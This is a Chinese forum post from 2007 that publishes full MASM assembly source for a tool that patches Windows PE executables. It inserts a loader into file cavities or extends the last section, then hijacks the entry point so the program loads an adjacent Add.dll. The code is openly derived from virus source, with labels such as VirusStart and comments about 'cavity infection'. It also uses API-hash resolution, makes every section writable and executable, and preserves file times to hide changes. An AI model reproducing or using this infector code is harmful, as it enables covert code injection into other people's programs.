不过这个方法也有它的不足之处,那就是怕文件头没有地方再新增节表了。所以俺更喜欢把代码插入PE文件的空隙(浪费资源可耻啊!),如果空隙不够的话就增加最后一个节的长度(因为现在很多软件都加了壳,基本上没有什么空隙),呵呵。 修改后的PE文件会加载同目录下的Add.dll文件! 源代码如下,写得很匆忙,Bug可能很多,也没加什么注释,请见谅! ;********************************************************* ;PE文件附加线程修改器1.0 by zjjmj2002 ;借鉴了很多病毒的源代码,特此表示感谢! ;写得很急,可能Bug很多,请见谅! ;********************************************************* .386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc include shell32.inc include comdlg32.inc include masm32.inc include debug.inc includelib kernel32.lib includelib user32.lib includelib shell32.lib includelib comdlg32.lib includelib masm32.lib includelib debug.lib ;********************************************************* ;定义宏 ;********************************************************* CTEXT MACRO y:VARARG LOCAL sym CONST segment ifidni <y>,<> sym db 0 else sym db y,0 endif CONST ends exitm <offset sym> ENDM ;********************************************************* ;常量定义 ;********************************************************* VirusSize = offset VirusEnd-offset VirusStart .const IDI_LC equ 1 ICO_MAIN equ 2 IDC_BUTTON_BROWSE equ 3000 IDC_EDIT_FILENAME equ 3001 IDC_EDIT_PASSWORD equ 3002 IDC_CHECKBOX_KEEPBACKUP equ 3003 IDC_BUTTON_PROCESS equ 3004 IDC_BUTTON_ABOUT equ 3005 IDC_BUTTON_EXIT equ 3006 IDC_BUTTON_HELP equ 3007 IDC_BUTTON_HOMEPAGE equ 3008 DLG_HELP equ 3009 IDC_EDIT_PASSWORD_2 equ 3010 IDM_MENU_ABOUT equ 3011 ;********************************************************* ;变量定义 ;********************************************************* .data szDlgName db "DIALOG", 0 szCaption db " ", 0 szMenuAbout db "About Me!", 0 szFileFilter db "Executables (*.exe)", 0, "*.exe", 0, 0 szStatusDone db "Done!", 0 szError db "Error", 0 szErrorThread db "Error at %08Xh", 13, 10, "Registers:", 13, 10, "eax = %08Xh ebx = %08Xh ecx = %08Xh", 13, 10, "edx = %08Xh esp = %08Xh ebp = %08Xh", 13, 10, "esi = %08Xh edi = %08Xh", 13, 10, 13, 10, "Recovering...", 0 szErrorFinal db "Error at %08Xh", 13, 10, "Quitting...", 0 szFileName db 256 dup (0) ; ;********************************************************* ;常量定义 ;********************************************************* .const ;********************************************************* ;代码段开始 ;********************************************************* .code VirusStart: pushad call @F @@: pop ebx sub ebx,offset @B .if ebx ;in host? mov eax,[esp+24h] .else mov eax,[esp+20h] .endif @@: and ax,0f000h sub eax,1000h cmp word ptr [eax],'ZM' jnz @b mov ebp,eax ;EBP=hKernel32 .if edx ;if in carrier ,restore the old entry! sub dword ptr [esp+20h],5 mov edx,[esp+20h] mov al,dwOldEntryCom[ebx] mov [edx],al mov eax,dword ptr dwOldEntryCom[ebx+1] mov [edx+1],eax .endif call @f db "add.dll",0 @@: call dwLoadLibraryA[ebx] popad ret dwOldEntryCom db 0,0,0,0,0 ;The OldEntry ;Section Data _SectionAddress: dd offset VirusStart dd VirusSize _GetProcAddress proc _hModule,_ProcName ;This routine is writing by others:) pushad mov edx,_hModule add edx,[edx+3ch] mov edx,[edx+78h] add edx,_hModule mov ecx,[edx+18h] mov esi,[edx+20h] add esi,_hModule @@: push ecx lodsd add eax,_hModule xor edi,edi .repeat mov ecx,[eax] inc eax adc edi,ecx rol ecx,8 .until cl==0 cmp edi,_ProcName ;Add and compare ,maybe have bugs. pop ecx loopnz @b .if ZERO? sub esi,4 sub esi,_hModule sub esi,[edx+20h] shr esi,1 add esi,[edx+24h] add esi,_hModule lodsd movzx eax,ax shl eax,2 add eax,[edx+1ch] add eax,_hModule mov edx,[eax] add edx,_hModule mov [esp+1ch],edx .else mov dword ptr [esp+1ch],0 .endif popad ret _GetProcAddress endp FunctionNameTab: szCreateProcessW dd 074D9F4C0h szCreateFileW dd 01479946Fh szGetFileAttributesW dd 004788654h szSetFileAttributesW dd 004788660h szCreateFileMappingW dd 0E3486339h szMapViewOfFile dd 0D444401Dh szUnmapViewOfFile dd 0A6131C00h szGetFileSize dd 01E92925Ch szGetFileTime dd 01286865Dh szSetFileTime dd 012868669h szGetFileType dd 02599996Dh szCloseHandle dd 027969D71h szCreateProcessInternalW dd 0B51A3504h szLoadLibraryA dd 07DDF0CDCh szOpenProcess dd 050B5B28Bh szVirtualAllocEx dd 062D4C5D2h szLocalFree dd 051B4BEA3h szGetProcAddress dd 05ED2C494h dd 0 FunctionAddressTab: dwCreateProcessW dd 0 dwCreateFileW dd 0 dwGetFileAttributesW dd 0 dwSetFileAttributesW dd 0 dwCreateFileMappingW dd 0 dwMapViewOfFile dd 0 dwUnmapViewOfFile dd 0 dwGetFileSize dd 0 dwGetFileTime dd 0 dwSetFileTime dd 0 dwGetFileType dd 0 dwCloseHandle dd 0 dwCreateProcessInternalW dd 0 dwLoadLibraryA dd 0 dwOpenProcess dd 0 dwVirtualAllocEx dd 0 dwLocalFree dd 0 dwGetProcAddress dd 0 szVersion db 'VER1.0',0 VirusEnd: .data? ;********************************************************* ;修改PE文件代码段开始 ;********************************************************* .code AboutProc proc uses edx hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM .if uMsg == WM_CLOSE invoke EndDialog, hWnd, 0 .elseif uMsg == WM_INITDIALOG ;设置我的图标: invoke LoadIcon, hInstance, IDI_LC invoke SendMessage, hWnd, WM_SETICON, ICON_SMALL, eax .elseif uMsg == WM_COMMAND mov eax, wParam mov edx, eax shr edx, 16 movzx eax, ax .if edx == BN_CLICKED .if eax == IDCANCEL || eax == IDOK invoke EndDialog, hWnd, NULL .elseif eax == IDC_BUTTON_HOMEPAGE ;打开我的主页: invoke ShellExecute, hWnd, CTEXT("open"), CTEXT("http://bbs.618100.com"), NULL, NULL, SW_SHOWNORMAL .elseif eax == IDC_BUTTON_HELP ;打开 help.chm : invoke ShellExecute, hWnd, CTEXT("open"), CTEXT("help.txt"), NULL, NULL, SW_SHOWNORMAL .endif .endif .else mov eax, FALSE ret .endif mov eax, TRUE ret AboutProc endp _FindSpace proc _StartAddress,_Size,_RequireSize pushfd push esi push edi cld mov eax,_StartAddress .if word ptr [eax]=='ZM' add eax,[eax+3ch] .if dword ptr [eax]=='EP' movzx edx,word ptr [eax+14h] add edx,18h add edx,eax sub edx,_StartAddress sub _Size,edx add _StartAddress,edx .endif .endif mov edi,_StartAddress mov ecx,_Size shr ecx,2 xor eax,eax @@: repnz scasd lea esi,[edi-4] mov edx,esi repz scasd sub edx,edi neg edx sub edx,4 jecxz _FindSpace1 cmp edx,_RequireSize jb @b _FindSpace1: .if edx>=_RequireSize lea eax,[esi+4] sub edx,4 .endif pop edi pop esi popfd ret _FindSpace endp _TranslateAddr proc _hModule,_Addr,_Flag local @dwFlag xor eax,eax pushad mov eax,_Flag shr eax,1 mov @dwFlag,eax and byte ptr _Flag,1 mov eax,_hModule add eax,[eax+3ch] movzx edx,word ptr [eax+14h] add edx,18h add edx,eax mov ecx,_Addr .if _Flag==0 && ecx>_hModule sub ecx,_hModule .elseif _Flag==1 && ecx>[eax+34h] sub ecx,[eax+34h] .endif mov _Addr,ecx .if ecx<[eax+54h] .if _Flag==0 add ecx,[eax+34h] .else add ecx,_hModule .endif mov [esp+1ch],ecx jmp _TranslateAddr1 .endif movzx ecx,word ptr [eax+6] .repeat .if _Flag==0 mov esi,[edx+14h] mov edi,[edx+10h] add edi,esi .else mov esi,[edx+12] mov edi,[edx+8] add edi,esi .endif .if _Addr>=esi && _Addr<edi .if !@dwFlag test byte ptr [edx+27h],80h .if !ZERO? mov dword ptr [esp+1ch],-1 .break .endif .endif sub esi,_Addr neg esi .if _Flag==0 add esi,[edx+12] add esi,[eax+34h] .else add esi,[edx+14h] add esi,_hModule .endif mov [esp+1ch],esi .break .endif add edx,28h .break .if !ecx .untilcxz _TranslateAddr1: popad ret _TranslateAddr endp ;The infection method is cavity infection.It will insert pieces of itself to the cavity of host ;file,but if there are no enough place for it,it will append to the tail of host file. Protect proc proc _lpFileName;infect file local @hFile local @hFileMap local @lpFileMap local @dwFileSize local @dwFileAttributes local @stFileTime1:FILETIME local @stFileTime2:FILETIME local @stFileTime3:FILETIME local @szTempBuffer[100h]:byte nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop pushad xor ebx,ebx push _lpFileName call dwGetFileAttributesW[ebx] .if eax!=-1 mov @dwFileAttributes,eax push 80h push _lpFileName call dwSetFileAttributesW[ebx] push 0 push 80h push 3 push 0 push 3 push 0c0000000h push _lpFileName call dwCreateFileW[ebx] .if eax!=-1 mov @hFile,eax push eax call dwGetFileType[ebx] .if eax==FILE_TYPE_DISK push 0 push @hFile call dwGetFileSize[ebx] mov @dwFileSize,eax lea eax,@stFileTime3 push eax lea eax,@stFileTime2 push eax lea eax,@stFileTime1 push eax push @hFile call dwGetFileTime[ebx] push 0 push 0 push 0 push 4 push 0 push @hFile call dwCreateFileMappingW[ebx] .if eax mov @hFileMap,eax push 0 push 0 push 0 push 6 push eax call dwMapViewOfFile[ebx] .if eax mov @lpFileMap,eax ;assume eax:img_dos_hdr<> ;.if @dwFileSize<10000000 ;I dont like infect BIG file ! .if word ptr [eax]=='ZM' ;eax.e_magic .if byte ptr [eax+38h]==00 add eax,[eax+3ch] ;add eax,eax.e_lfanew ;assume eax:img_nt_hdrs<> .if dword ptr [eax]=='EP' ;eax.Signature bt dword ptr [eax+16h],13 ;eax.Characteristics .if !CARRY? lea edi,@szTempBuffer mov eax,@lpFileMap mov edx,@dwFileSize push 18h pop ecx @@: push ecx push VirusSize push edx push eax call _FindSpace .if eax push eax push 0 push eax push @lpFileMap call _TranslateAddr cmp eax,1 pop eax jl _EditFile1 stosd xchg eax,edx stosd xchg eax,edx _EditFile1: add eax,edx mov ecx,eax sub ecx,@lpFileMap mov edx,@dwFileSize sub edx,ecx .endif or eax,eax pop ecx loopnz @b xor eax,eax stosd stosd push 4 pop edx .while dword ptr [@szTempBuffer+edx] .if dword ptr [@szTempBuffer+edx] >= VirusSize mov eax,dword ptr [@szTempBuffer+edx-4] mov dword ptr @szTempBuffer,eax mov eax,dword ptr [@szTempBuffer+edx] mov dword ptr @szTempBuffer+4,eax xor eax,eax mov dword ptr @szTempBuffer+8,eax mov dword ptr @szTempBuffer+12,eax .break .elseif dword ptr [@szTempBuffer+edx] >= VirusSize mov eax,dword ptr [@szTempBuffer+edx-4] xchg dword ptr @szTempBuffer,eax mov dword ptr [@szTempBuffer+edx-4],eax mov eax,dword ptr [@szTempBuffer+edx] xchg dword ptr @szTempBuffer+4,eax mov dword ptr [@szTempBuffer+edx],eax .break .endif add edx,8 .endw push 4 pop edx xor eax,eax .while dword ptr [@szTempBuffer+edx] add eax,dword ptr [@szTempBuffer+edx] ;Count Space add edx,8 .endw .if dword ptr [@szTempBuffer+4] >= VirusSize && eax >= VirusSize mov eax,VirusSize lea edx,@szTempBuffer lea esi,VirusStart[ebx] .while dword ptr [edx] .if dword ptr [edx+4] >= eax mov dword ptr [edx+4],eax .endif mov edi,[edx] mov ecx,[edx+4] rep movsb sub eax,[edx+4] .break .if !eax add edx,8 .endw xor eax,eax mov [edx+8],eax mov [edx+12],eax lea esi,@szTempBuffer mov edi,[esi] add edi,offset _SectionAddress-offset VirusStart mov edx,esi .while dword ptr [edx] push 2 push dword ptr [edx] push @lpFileMap call _TranslateAddr mov [edx],eax add edx,8 .endw push 19h*2 pop ecx pushad rep movsd popad mov edx,@lpFileMap add edx,[edx+3ch] ;e_lfanew edx:img_nt_hdrs<> push 3 push dword ptr [edx+28h] ;img_nt_hdrs.AddressOfEntryPoint push @lpFileMap call _TranslateAddr mov esi,eax ;esi=Enter addr mov cl,[esi] mov byte ptr [edi-5],cl mov ecx,[esi+1] mov dword ptr [edi-4],ecx ;save Enter addr edi=offset __SectionAddress sub edi,offset _SectionAddress-offset VirusStart ;edi=offset VirusStart push 2 push edi push @lpFileMap call _TranslateAddr sub eax,[edx+34h] ;edx.ImageBase sub eax,[edx+28h] ;edx.AddressOfEntryPoint sub eax,5 ;5byte of mov byte ptr [esi],0e8h ;Opcode of Call mov [esi+1],eax ;new movzx eax,word ptr [edx+14h] ;edx.SizeOfOptionalHeader add eax,18h movzx ecx,word ptr [edx+6] ;edx.NumberOfSections add edx,eax ;edx:IMAGE_SECTION_HEADER .repeat mov eax,[edx+10h] ;edx. .if [edx+8]<eax ;edx. mov [edx+8],eax .endif mov dword ptr [edx+24h],0e00000e0h ; add edx,28h ; .break .if !ecx .untilcxz .else ;if there is no enough place, add it in tail push @lpFileMap call dwUnmapViewOfFile[ebx] push @hFileMap call dwCloseHandle[ebx] mov eax,@dwFileSize add eax,01000h push 0 push eax push 0 push 4 push 0 push @hFile call dwCreateFileMappingW[ebx] mov @hFileMap,eax push 0 push 0 push 0 push 6 push eax call dwMapViewOfFile[ebx] mov @lpFileMap,eax add eax,[eax+3ch] ;eax:img_nt_hdrs<> mov edx,[eax+50h] ;eax.SizeOfImage add edx,1000h mov [eax+50h],edx movzx ecx,word ptr [eax+6] ;eax.NumberOfSections dec ecx xchg eax,ecx mov edx,28h mul edx xchg eax,ecx movzx edx,word ptr [eax+14h] ;eax.SizeOfOptionalHeader add edx,18h add edx,eax add edx,ecx mov edi,@lpFileMap add edi,@dwFileSize lea esi,VirusStart[ebx] mov ecx,VirusSize pushad rep movsb popad ;mov ecx,@dwFileSize ;add ecx,VirusSize ;sub ecx,[edx+14h] mov ecx,[edx+8] add ecx,01000h mov [edx+8],ecx mov ecx,[edx+10h] add ecx,01000h mov [edx+10h],ecx mov edx,@lpFileMap add edx,[edx+3ch] push 3 push dword ptr [edx+28h] push @lpFileMap call _TranslateAddr mov esi,eax mov edi,@lpFileMap add edi,@dwFileSize add edi,offset _SectionAddress-offset VirusStart mov cl,[esi] mov byte ptr [edi-5],cl mov ecx,[esi+1] mov dword ptr [edi-4],ecx sub edi,offset _SectionAddress-offset VirusStart push 2 push edi push @lpFileMap call _TranslateAddr sub eax,[edx+34h] sub eax,[edx+28h] sub eax,5 mov byte ptr [esi],0e8h mov [esi+1],eax movzx eax,word ptr [edx+14h] add eax,18h movzx ecx,word ptr [edx+6] add edx,eax .repeat mov eax,[edx+10h] .if [edx+8]<eax mov [edx+8],eax .endif mov dword ptr [edx+24h],0e00000e0h add edx,28h .break .if !ecx .untilcxz push 2 push edi push @lpFileMap call _TranslateAddr add edi,offset _SectionAddress-offset VirusStart mov [edi],eax xor eax,eax mov [edi+8],eax .endif mov eax,@lpFileMap mov dword ptr [eax+38h],'JMJ' invoke MessageBox,NULL,CTEXT("修改成功",0),CTEXT("Success!",0),MB_OK .endif;'DLL' ;invoke MessageBox,NULL,CTEXT("不是exe文件",0),CTEXT("Error!",0),MB_OK .endif;'EP' ;invoke MessageBox,NULL,CTEXT("无EP标志",0),CTEXT("Error!",0),MB_OK .endif;! ' ;invoke MessageBox,NULL,CTEXT("已经Modify过了!",0),CTEXT("Error!",0),MB_OK .endif;'ZM' ;invoke MessageBox,NULL,CTEXT("无MZ标志",0),CTEXT("Error!",0),MB_OK ;.endif ;size push @lpFileMap call dwUnmapViewOfFile[ebx] .endif push @hFileMap call dwCloseHandle[ebx] .endif lea eax,@stFileTime3 push eax lea eax,@stFileTime2 push eax lea eax,@stFileTime1 push eax push @hFile call dwSetFileTime[ebx] .endif push @hFile call dwCloseHandle[ebx] .endif push @dwFileAttributes push _lpFileName call dwSetFileAttributesW[ebx] .endif popad ret Protect endp WndProc proc hWnd:DWORD, uMsg:DWORD, wParam:DWORD, lParam:DWORD .if uMsg == WM_CLOSE invoke EndDialog, hWnd, 0 .elseif uMsg == WM_INITDIALOG ;设置我的图标: invoke LoadIcon, hInstance, ICO_MAIN invoke SendMessage, hWnd, WM_SETICON, ICON_SMALL, eax invoke CheckDlgButton, hWnd, IDC_CHECKBOX_KEEPBACKUP, BST_CHECKED mov eax, hWnd mov mbp.hwndOwner, eax mov ofn.hwndOwner, eax invoke GetSystemMenu, eax, 0 push offset szMenuAbout push IDM_MENU_ABOUT push MFT_STRING push eax ;invoke AppendMenu, eax, MFT_SEPARATOR, 0, 0 call AppendMenu invoke SendDlgItemMessage, hWnd, IDC_EDIT_FILENAME, EM_SETLIMITTEXT, sizeof szFileName, 0 invoke SendDlgItemMessage, hWnd, IDC_EDIT_PASSWORD, EM_SETLIMITTEXT, sizeof szPassword, 0 invoke SendDlgItemMessage, hWnd, IDC_EDIT_PASSWORD_2, EM_SETLIMITTEXT, sizeof szPassword_2, 0 .elseif uMsg == WM_SYSCOMMAND .if wParam == IDM_MENU_ABOUT ;打开“关于”对话框: invoke DialogBoxParam, hInstance, DLG_HELP, hWnd, offset AboutProc, 0 .endif .elseif uMsg == WM_COMMAND mov eax, wParam .if ax == IDC_BUTTON_BROWSE ;“打开文件”对话框: mov ofn.lStructSize, sizeof ofn mov ofn.lpstrFilter, offset szFileFilter mov ofn.lpstrFile, offset szFileName mov ofn.nMaxFile, sizeof szFileName invoke GetOpenFileName, addr ofn ;如果选择了一个文件,就把它的文件名输出到“文件名”这个 Edit 中: test eax, eax .if !zero? invoke SetDlgItemText, hWnd, IDC_EDIT_FILENAME, addr szFileName .endif .elseif ax == IDC_BUTTON_PROCESS || ax == IDOK invoke GetDlgItemTextW, [mbp.hwndOwner], IDC_EDIT_FILENAME, addr szFileName, sizeof szFileName invoke Protect,addr szFileName .elseif ax == IDC_BUTTON_ABOUT ;“关于”对话框: invoke DialogBoxParam, hInstance, DLG_HELP, hWnd, offset AboutProc, 0 .elseif ax == IDC_BUTTON_EXIT ; Over,走人... invoke SendMessage, hWnd, WM_CLOSE, 0, 0 .endif .else mov eax, FALSE ret .endif xor eax, eax ret WndProc endp main: ;以下一段内容不用多解释吧? call @F @@: pop ebx sub ebx,offset @B invoke LoadLibrary,CTEXT("kernel32.dll",0) mov ebp,eax ;EBP=hKernel32 lea esi,FunctionNameTab[ebx] lea edi,FunctionAddressTab[ebx] @@: lodsd push eax push ebp call _GetProcAddress stosd cmp dword ptr [esi],0 loopnz @b invoke GetModuleHandle, eax mov hInstance, eax mov mbp.hInstance, eax mov ofn.hInstance, eax invoke DialogBoxParam, eax, addr szDlgName, 0, addr WndProc, eax invoke ExitProcess, eax end main ;******************** over ******************** |
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发布于:2007-04-19 23:38
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发布于:2007-04-24 10:50